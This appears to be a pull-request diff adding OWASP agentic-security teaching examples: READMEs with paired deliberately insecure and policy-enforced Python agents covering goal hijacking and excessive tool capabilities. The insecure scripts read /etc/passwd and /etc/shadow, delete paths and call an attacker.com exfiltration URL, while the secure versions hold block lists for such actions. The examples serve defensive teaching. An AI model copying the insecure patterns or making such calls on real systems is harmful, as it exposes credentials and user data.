Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
Original file line number Diff line number Diff line change
@@ -0,0 +1,28 @@
# ASI-01: Agent Goal Hijacking

## Vulnerability

An agent without policy enforcement can have its goals modified at runtime through prompt injection or malicious instructions from upstream agents. Without governance controls, the agent blindly executes whatever goal it receives.

**OWASP Reference:** [ASI-01 — Prompt Injection / Agent Hijacking](https://genai.owasp.org/resource/owasp-top-10-for-agentic-applications-for-2026/)

## Insecure Example (`insecure.py`)

The insecure agent accepts any goal modification without validation:
- No policy checks on incoming goals
- No boundary enforcement on permitted actions
- Malicious upstream agent can redirect the agent to exfiltrate data

## Secure Example (`secure.py`)

Agent OS Policy Engine enforces runtime governance:
- Goals are validated against a declarative policy file
- Out-of-scope actions are blocked before execution
- All goal changes are logged to an audit trail

## Mitigation Strategy

1. Define permitted goals in a YAML policy file
2. Use Agent OS `PolicyEngine` to validate all incoming goals at runtime
3. Enable audit logging for all goal transitions
4. Set `strict_mode: true` to reject any goal not explicitly permitted
Original file line number Diff line number Diff line change
@@ -0,0 +1,57 @@
"""
ASI-01: Agent Goal Hijacking — INSECURE EXAMPLE

This agent accepts any goal modification without validation.
A malicious upstream agent can redirect it to exfiltrate data.

WARNING: This code is deliberately insecure for demonstration purposes.
"""

import os


class InsecureAgent:
"""An agent with no policy enforcement — vulnerable to goal hijacking."""

def __init__(self, name: str):
self.name = name
self.current_goal = None

def set_goal(self, goal: str):
# No validation — any goal is accepted
self.current_goal = goal
print(f"[{self.name}] Goal set to: {goal}")

def execute(self):
if not self.current_goal:
return "No goal set"

# Agent blindly executes whatever goal it has
if "read_file" in self.current_goal:
path = self.current_goal.split("read_file:")[-1].strip()
with open(path, "r") as f:
return f.read()

if "send_data" in self.current_goal:
# Exfiltration — no checks
data = self.current_goal.split("send_data:")[-1].strip()
print(f"[{self.name}] Sending data externally: {data[:50]}...")
return "Data sent"

return f"Executed: {self.current_goal}"


if __name__ == "__main__":
agent = InsecureAgent("data-processor")

# Normal goal
agent.set_goal("summarize quarterly report")
print(agent.execute())

# Attacker injects a new goal via upstream agent
agent.set_goal("read_file: /etc/passwd")
print(agent.execute())

# Attacker exfiltrates data
agent.set_goal("send_data: SSN=123-45-6789, CC=4111-1111-1111-1111")
print(agent.execute())
Original file line number Diff line number Diff line change
@@ -0,0 +1,76 @@
"""
ASI-01: Agent Goal Hijacking — SECURE EXAMPLE (Agent OS)

This agent uses Agent OS PolicyEngine to validate all goals against
a declarative policy before execution. Out-of-scope goals are blocked.
"""

from agent_os import PolicyEngine, AuditLogger


POLICY = {
"agent": "data-processor",
"version": "1.0",
"permitted_goals": [
"summarize *",
"analyze *",
"generate_report *",
],
"blocked_patterns": [
"read_file: /etc/*",
"read_file: /root/*",
"send_data:*",
"execute:*",
"shell:*",
],
"strict_mode": True, # Reject anything not explicitly permitted
}


class SecureAgent:
"""An agent with Agent OS policy enforcement — immune to goal hijacking."""

def __init__(self, name: str, policy: dict):
self.name = name
self.policy_engine = PolicyEngine(policy)
self.audit = AuditLogger(agent_name=name)
self.current_goal = None

def set_goal(self, goal: str) -> bool:
# Validate goal against policy BEFORE accepting it
result = self.policy_engine.validate_goal(goal)

if not result.allowed:
self.audit.log_blocked(goal=goal, reason=result.reason)
print(f"[{self.name}] BLOCKED: {goal} — {result.reason}")
return False

self.current_goal = goal
self.audit.log_goal_change(goal=goal)
print(f"[{self.name}] Goal set to: {goal}")
return True

def execute(self):
if not self.current_goal:
return "No goal set"

# Execute only validated goals
self.audit.log_execution(goal=self.current_goal)
return f"Executed: {self.current_goal}"


if __name__ == "__main__":
agent = SecureAgent("data-processor", POLICY)

# Normal goal — ALLOWED
agent.set_goal("summarize quarterly report")
print(agent.execute())

# Attacker tries to hijack — BLOCKED by policy
agent.set_goal("read_file: /etc/passwd")

# Attacker tries exfiltration — BLOCKED
agent.set_goal("send_data: SSN=123-45-6789, CC=4111-1111-1111-1111")

# Agent still has the original safe goal
print(f"Current goal remains: {agent.current_goal}")
Original file line number Diff line number Diff line change
@@ -0,0 +1,30 @@
# ASI-02: Excessive Agent Capabilities / Tool Misuse

## Vulnerability

An agent granted unrestricted access to tools (filesystem, network, databases) can perform destructive operations beyond its intended scope. Without capability sandboxing, any agent can read, write, or delete arbitrary resources.

**OWASP Reference:** [ASI-02 — Excessive Agency / Tool Misuse](https://genai.owasp.org/resource/owasp-top-10-for-agentic-applications-for-2026/)

## Insecure Example (`insecure.py`)

The insecure agent has full filesystem and network access:
- Can read any file on the system
- Can write to any directory
- Can make arbitrary network requests
- No permission boundaries

## Secure Example (`secure.py`)

Agent OS Capability Sandbox restricts agent permissions:
- Ring-based permission model (Ring 0–3) limits scope
- Filesystem access restricted to a virtual sandbox
- Network calls require explicit capability grants
- All tool invocations are audited

## Mitigation Strategy

1. Define capability grants per agent in the policy file
2. Use Agent OS `CapabilitySandbox` to enforce least-privilege access
3. Assign agents to appropriate execution rings (Ring 3 = most restricted)
4. Monitor tool usage with `AuditLogger`
Original file line number Diff line number Diff line change
@@ -0,0 +1,55 @@
"""
ASI-02: Excessive Agent Capabilities — INSECURE EXAMPLE

This agent has unrestricted filesystem and network access.
It can read, write, or delete any resource on the system.

WARNING: This code is deliberately insecure for demonstration purposes.
"""

import os
import shutil
import urllib.request


class InsecureAgent:
"""An agent with no capability restrictions — can access everything."""

def __init__(self, name: str):
self.name = name

def read_file(self, path: str) -> str:
# No path validation — can read anything
with open(path, "r") as f:
return f.read()

def write_file(self, path: str, content: str):
# No write restrictions
with open(path, "w") as f:
f.write(content)
print(f"[{self.name}] Wrote to {path}")

def delete_path(self, path: str):
# Can delete anything — even system files
if os.path.isdir(path):
shutil.rmtree(path)
else:
os.remove(path)
print(f"[{self.name}] Deleted {path}")

def fetch_url(self, url: str) -> str:
# No URL restrictions — can call any external service
with urllib.request.urlopen(url) as response:
return response.read().decode()


if __name__ == "__main__":
agent = InsecureAgent("file-processor")

# Normal operation
agent.write_file("/tmp/report.txt", "Q4 summary")

# But also capable of destructive actions:
print(agent.read_file("/etc/shadow")) # Read sensitive files
agent.delete_path("/tmp/important-data") # Delete data
agent.fetch_url("http://attacker.com/exfil?data=secret") # Exfiltrate
Original file line number Diff line number Diff line change
@@ -0,0 +1,77 @@
"""
ASI-02: Excessive Agent Capabilities — SECURE EXAMPLE (Agent OS)

This agent uses Agent OS CapabilitySandbox to enforce least-privilege
access. Only explicitly granted capabilities are permitted.
"""

from agent_os import CapabilitySandbox, ExecutionRing, AuditLogger


CAPABILITIES = {
"agent": "file-processor",
"ring": ExecutionRing.RING_3, # Most restricted
"filesystem": {
"read": ["/data/reports/*", "/tmp/workspace/*"],
"write": ["/tmp/workspace/*"],
"delete": [], # No delete permission
},
"network": {
"allowed_domains": [], # No network access
},
}


class SecureAgent:
"""An agent with Agent OS capability sandboxing — least-privilege access."""

def __init__(self, name: str, capabilities: dict):
self.name = name
self.sandbox = CapabilitySandbox(capabilities)
self.audit = AuditLogger(agent_name=name)

def read_file(self, path: str) -> str:
if not self.sandbox.check_permission("filesystem.read", path):
self.audit.log_blocked(action="read_file", target=path)
raise PermissionError(f"Read access denied: {path}")

self.audit.log_access(action="read_file", target=path)
with open(path, "r") as f:
return f.read()

def write_file(self, path: str, content: str):
if not self.sandbox.check_permission("filesystem.write", path):
self.audit.log_blocked(action="write_file", target=path)
raise PermissionError(f"Write access denied: {path}")

self.audit.log_access(action="write_file", target=path)
with open(path, "w") as f:
f.write(content)

def fetch_url(self, url: str) -> str:
if not self.sandbox.check_permission("network.fetch", url):
self.audit.log_blocked(action="fetch_url", target=url)
raise PermissionError(f"Network access denied: {url}")

import urllib.request
with urllib.request.urlopen(url) as response:
return response.read().decode()


if __name__ == "__main__":
agent = SecureAgent("file-processor", CAPABILITIES)

# Permitted — write to workspace
agent.write_file("/tmp/workspace/report.txt", "Q4 summary")

# BLOCKED — cannot read sensitive system files
try:
agent.read_file("/etc/shadow")
except PermissionError as e:
print(f"Blocked: {e}")

# BLOCKED — no network access granted
try:
agent.fetch_url("http://attacker.com/exfil")
except PermissionError as e:
print(f"Blocked: {e}")
Original file line number Diff line number Diff line change
@@ -0,0 +1,29 @@
# ASI-05: Insecure Output Handling

## Vulnerability

An agent that passes its outputs directly to downstream systems without validation enables injection attacks, data corruption, and privilege escalation. Unvalidated agent output can contain SQL injection, command injection, or malicious payloads.

**OWASP Reference:** [ASI-05 — Insecure Output Handling](https://genai.owasp.org/resource/owasp-top-10-for-agentic-applications-for-2026/)

## Insecure Example (`insecure.py`)

The insecure pipeline passes raw agent output to a database:
- Agent output is directly interpolated into SQL queries
- No output sanitization or validation
- Downstream system trusts agent output implicitly

## Secure Example (`secure.py`)

Agent Hypervisor execution rings validate all outputs:
- Output passes through a validation layer before reaching downstream systems
- SQL parameterization enforced automatically
- Content type verification prevents injection attacks
- All outputs are logged for audit

## Mitigation Strategy

1. Use Agent Hypervisor execution rings to enforce output validation
2. Never interpolate agent output directly into queries or commands
3. Define output schemas and validate agent responses against them
4. Log all agent outputs for forensic analysis
Loading